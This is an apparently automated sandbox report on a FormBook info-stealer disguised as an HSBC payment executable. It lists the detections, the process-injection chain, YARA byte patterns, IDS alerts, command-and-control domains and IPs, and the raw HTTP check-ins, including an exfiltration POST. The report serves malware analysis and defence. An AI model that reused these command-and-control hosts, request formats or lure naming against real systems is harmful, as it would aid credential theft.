Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rHSBCBank_Paymentswiftcpy.exe

Overview

General Information

Sample name:rHSBCBank_Paymentswiftcpy.exe
Analysis ID:1539076
MD5:6ba55b78696072ea7f7f56c955fe1c0b
SHA1:7f061f071b237e9defd98fbfdea99caebe97960d
SHA256:8771179cb6f0488244c65cdfab07668bfaea4d0b28a77ee94879448662fde67e
Tags:exeuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rHSBCBank_Paymentswiftcpy.exe (PID: 5672 cmdline: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe" MD5: 6BA55B78696072EA7F7F56C955FE1C0B)
    • svchost.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • EqOUZfSIzU.exe (PID: 5696 cmdline: "C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 6324 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • EqOUZfSIzU.exe (PID: 5776 cmdline: "C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2eea3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e0a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2eea3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ParentImage: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe, ParentProcessId: 5672, ParentProcessName: rHSBCBank_Paymentswiftcpy.exe, ProcessCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ProcessId: 4208, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ParentImage: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe, ParentProcessId: 5672, ParentProcessName: rHSBCBank_Paymentswiftcpy.exe, ProcessCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ProcessId: 4208, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-22T05:38:36.187115+020020507451Malware Command and Control Activity Detected192.168.2.649868208.91.197.2780TCP
            2024-10-22T05:39:08.255197+020020507451Malware Command and Control Activity Detected192.168.2.649975198.44.251.20380TCP
            2024-10-22T05:39:21.895109+020020507451Malware Command and Control Activity Detected192.168.2.64998081.2.196.1980TCP
            2024-10-22T05:39:35.613850+020020507451Malware Command and Control Activity Detected192.168.2.649984195.110.124.13380TCP
            2024-10-22T05:39:49.438369+020020507451Malware Command and Control Activity Detected192.168.2.64998854.67.87.11080TCP
            2024-10-22T05:40:07.806885+020020507451Malware Command and Control Activity Detected192.168.2.649992199.59.243.22780TCP
            2024-10-22T05:40:21.217859+020020507451Malware Command and Control Activity Detected192.168.2.649996162.213.249.21680TCP
            2024-10-22T05:40:36.679327+020020507451Malware Command and Control Activity Detected192.168.2.650000221.121.144.14980TCP
            2024-10-22T05:40:50.204838+020020507451Malware Command and Control Activity Detected192.168.2.650004199.59.243.22780TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: hentaistgma.netVirustotal: Detection: 6%Perma Link
            Source: rHSBCBank_Paymentswiftcpy.exeReversingLabs: Detection: 34%
            Source: rHSBCBank_Paymentswiftcpy.exeVirustotal: Detection: 41%Perma Link
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: rHSBCBank_Paymentswiftcpy.exeJoe Sandbox ML: detected
            Source: rHSBCBank_Paymentswiftcpy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EqOUZfSIzU.exe, 00000004.00000000.2301808549.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3954823867.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0078445A
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078C6D1 FindFirstFileW,FindClose,0_2_0078C6D1
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0078C75C
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0078EF95
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0078F0F2
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0078F3F3
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007837EF
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00783B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00783B12
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0078BCBC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E1C0D0 FindFirstFileW,FindNextFileW,FindClose,5_2_02E1C0D0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then xor eax, eax5_2_02E09A90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then pop edi5_2_02E0DCD9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then mov ebx, 00000004h5_2_04BE04E8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49992 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49980 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49975 -> 198.44.251.203:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49868 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 221.121.144.149:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49988 -> 54.67.87.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49996 -> 162.213.249.216:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49984 -> 195.110.124.133:80
            Source: DNS query: www.ngmr.xyz
            Source: DNS query: www.inf30027group23.xyz
            Source: DNS query: www.inf30027group23.xyz
            Source: DNS query: www.shopdj00.xyz
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: Joe Sandbox ViewIP Address: 54.67.87.110 54.67.87.110
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007922EE
            Source: global trafficHTTP traffic detected: GET /y9rm/?kT9p=HEdRnjuxtNGVPFRX3NZ2CbxO5KjoR5mZP9Y7+HX2gpvgKHiu4zeqhoni6TAVjjgJNor6P4ykumohRwGjoGuDnTy/l81TemUdGivRuw5GfSiykvy81pD0xLcKVnn388uSWX5E4Mc=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.crochetpets.onlineConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /81ii/?kT9p=iEYuKHcgXzrj54zBLQ0hZtaSJWaO6arULYSJgyArOy1vcIlOyDidBtx/KVwStm3n+ESjpSctJ0ezJOALnhKyScKD8qKcTeL6NPgmk/TuCnkayb3nWF3ZDNroKudPs/s9dqx/VNU=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.n0pme6.topConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /whrh/?kT9p=gnKfhumZE8ltP6GxVxsfSkoTPawS2VBtj7Y+npcg3eEMwAInvracgWsTZFjZCdkRXfgdTNdTzgCPtAFV2cUEHvPEtEwM8Ua8v+/63k/H/bL/ar8k5HyBDG0f7Adpr1HKjoqz2Rg=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kovallo.cloudConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /qhr1/?kT9p=4vyhfeGJy1HoJfLgdJHMJiiF5ffL7B9jTKxpb/iJoZFHl/RjV/1B5t3r6p0bkAeKssIvV+AadX2UVbSNYhzuXtrdtufHlrgwCycB7eSZz2zZKA9MpZFsx/+zuOBsemQBs3csDLA=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hentaistgma.netConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /ntib/?in1Hf=rx3dZnMxlRvDbR&kT9p=6gBoL4716wSvqjL5PCL9Otm46h/RO+qAgNOYViOcikg4H3EcrAY/v4xx2gixZebSxES1QV9P/IXhCYI/sCqyeCK3gvy3e15BfbqdhxqVigAySd7dFKOwRmIIBq2hI0q3F0AcNNQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /rul7/?kT9p=IsmUDGhGjZ2KRgAKfB1HvhyyLqsJdQP3pRKzZVZQCTxvTYvFu3rbLrLYLQVbGlcBi+aKp17AAiqCJ8w25lZIlYoTQ+zVINLm/1UHvGbwh9Y2v06871qB8K3SuXDNUGwH3DJAZfI=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.polarmuseum.infoConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /w48t/?in1Hf=rx3dZnMxlRvDbR&kT9p=jJf+uzLSIbfTebLlnllI962yuVk8Hw4tbleG5p05VL9UtkahhFlDUVJutvL9vCK8DEN3aeTkpXm8VBxSWq3LxvJEsjtiOsjWB/GCZl2Odas12ant1owrZYZ7neQtVdJoZOGoB8U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.tophcom.onlineConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX+6J53waNs/qZsvobulOY9cjRmYN5o5DJXVIa4VTjeIROacIJgysQWwkDrvblS6LDkWdy22I4DlZH18HE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.inf30027group23.xyzConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficHTTP traffic detected: GET /g3wl/?kT9p=1CI2rntFLoR8LORJomanxZlvrsXZ8iOzXp0hteFUX7ZC4CpkEd9LFXVMj4GYlfKx8LXJCAGhhNbTKAnE5hN2yzgMyKEEG9EdyQR/qyvuetkdr/L/NuFg5/mzu6W7tc33QTvsPJE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.donante-de-ovulos.bizConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
            Source: global trafficDNS traffic detected: DNS query: www.crochetpets.online
            Source: global trafficDNS traffic detected: DNS query: www.n0pme6.top
            Source: global trafficDNS traffic detected: DNS query: www.kovallo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.hentaistgma.net
            Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
            Source: global trafficDNS traffic detected: DNS query: www.polarmuseum.info
            Source: global trafficDNS traffic detected: DNS query: www.tophcom.online
            Source: global trafficDNS traffic detected: DNS query: www.inf30027group23.xyz
            Source: global trafficDNS traffic detected: DNS query: www.donante-de-ovulos.biz
            Source: global trafficDNS traffic detected: DNS query: www.shopdj00.xyz
            Source: unknownHTTP traffic detected: POST /81ii/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.n0pme6.topOrigin: http://www.n0pme6.topConnection: closeCache-Control: no-cacheContent-Length: 209Content-Type: application/x-www-form-urlencodedReferer: http://www.n0pme6.top/81ii/User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 30 59 6e 2f 54 54 41 45 47 59 6d 54 42 56 53 4c 6e 6f 50 42 4a 62 65 4a 68 41 41 36 4f 6a 4d 48 5a 4f 30 5a 77 43 4b 64 42 49 39 7a 50 30 34 33 77 32 54 59 34 32 43 2b 2b 55 49 59 44 33 6a 5a 42 63 45 51 73 7a 4c 74 55 2f 43 68 38 59 66 2b 65 66 76 39 50 76 4a 46 71 2f 62 37 4a 32 45 48 2f 70 62 4c 61 42 54 41 54 66 33 6a 43 4d 64 2f 75 72 41 4b 63 49 64 6e 51 36 57 44 4e 67 75 54 6f 4c 37 2f 7a 6a 4b 74 79 38 4a 4f 36 51 4d 46 71 53 6e 47 52 6b 51 69 72 63 61 43 35 33 63 74 48 49 66 73 4c 43 4e 4f 53 61 33 63 53 6b 4a 74 50 67 46 39 75 4d 4d 4b 6e 77 4e 74 71 46 77 6c Data Ascii: kT9p=vGwOJ3xBFH3M0Yn/TTAEGYmTBVSLnoPBJbeJhAA6OjMHZO0ZwCKdBI9zP043w2TY42C++UIYD3jZBcEQszLtU/Ch8Yf+efv9PvJFq/b7J2EH/pbLaBTATf3jCMd/urAKcIdnQ6WDNguToL7/zjKty8JO6QMFqSnGRkQircaC53ctHIfsLCNOSa3cSkJtPgF9uMMKnwNtqFwl
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
